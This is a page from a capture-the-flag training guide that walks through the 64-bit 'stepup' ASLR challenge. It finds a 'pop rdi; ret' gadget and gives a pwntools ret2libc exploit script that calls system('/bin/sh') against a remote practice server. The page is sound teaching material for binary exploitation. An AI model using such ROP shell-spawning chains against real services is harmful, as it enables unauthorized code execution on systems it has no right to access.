Cyber Training Guide
IronForgeCyberHow-To: Radare2How-To: GDB
  • Cyber Training Guide
  • 0x0: Introduction
    • git-good
    • root-1
    • root-2
    • intro
  • Binary Exploitation (pwn)
    • What is Binary Exploitation?
    • 0x1: ret2win
      • win32
      • win64
      • args
    • 0x2: shellcodes
      • location
      • shell
      • constrained
    • 0x3: format strings
      • format
      • chase
      • bbpwn
    • 0x4: stack canaries
      • canary
      • findme
    • 0x5: ROP
      • rop2win
      • split
      • callme
      • write4
      • badchars
    • 0x6: PIE
      • gimme
      • leak32
      • leak64
    • 0x7: ASLR
      • groundzero
      • stepup
      • ret2plt
    • 0x8: GOT overwrites
      • gotem
      • gotem64
  • Programming
    • What is the Programming Section?
    • 0x9: Data Serialization
      • LinkedOps
      • Tree
      • TeLeVision
    • 0xA: Programming
      • Calorie Counting
      • Hash
      • Rock Paper Scissors
      • Watch the Register
      • Supply Stacks
      • Rope Bridge
      • Mountain Climbers
  • Reverse Engineering (RE)
    • What is Reverse Engineering?
    • 0xB: Ghidra
      • hardcode
      • undo
      • snake
  • Toolkit
    • Using Pwntools
      • Establishing Connection
      • Context
      • Sending/Receiving Data
      • The ELF Class
    • My Workflow
      • Tmux
      • Vim
Powered by GitBook
On this page
  • Getting our Gadget
  • Writing the Exploit

Was this helpful?

  1. Binary Exploitation (pwn)
  2. 0x7: ASLR

stepup

Beating ASLR again, using 64-bit this time.

PreviousgroundzeroNextret2plt

Last updated 1 year ago

Was this helpful?

This binary is similar to the last one, so we'll be reusing most of the same techniques. This time, we'll need a way to pass the /bin/sh address into rdi, which will require a gadget to do this.

Getting our Gadget

We'll do this the same way that we did it in the ROP chapter. We use ROPgadget or ropper to search for a gadget that will pop the top of the stack into rdi:

$ ROPgadget --binary stepup | grep "pop rdi"
0x00000000004011db : pop rdi ; ret
$ ropper -f stepup --search "pop rdi"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdi

[INFO] File: stepup
0x00000000004011db: pop rdi; ret; 
[0x00401169]> /R pop rdi
  0x004011db                 5f  pop rdi
  0x004011dc                 c3  ret

This is perfect. We'll use this gadget to pop the address of /bin/sh into rdi before calling system().

Writing the Exploit

This binary is nearly identical to the last one. We are provided the address of system(), so we can just use that directly. Checking read_in, we'll notice that it takes 40 bytes to reach the return pointer.

This is everything we need to write the exploit:

exploit.py
from pwn import *

elf = context.binary = ELF('./stepup')
libc = elf.libc
p = remote('vunrotc.cole-ellis.com', 6200)

p.recvuntil(b'at: ')
leak = int(p.recvline(), 16)
libc.address = leak - libc.sym.system
log.success(f'LIBC base: {hex(libc.address)}')

g_popRdi = 0x4011db

payload = b'A' * 40
payload += p64(g_popRdi)
payload += p64(next(libc.search(b'/bin/sh')))
payload += p64(libc.sym.system)

p.sendline(payload)
p.interactive()

Running this gets our flag! We beat ASLR in 64-bit, which was no different than in 32-bit. The only difference is that we had to use 64-bit gadgets and addresses.

3KB
stepup.zip
archive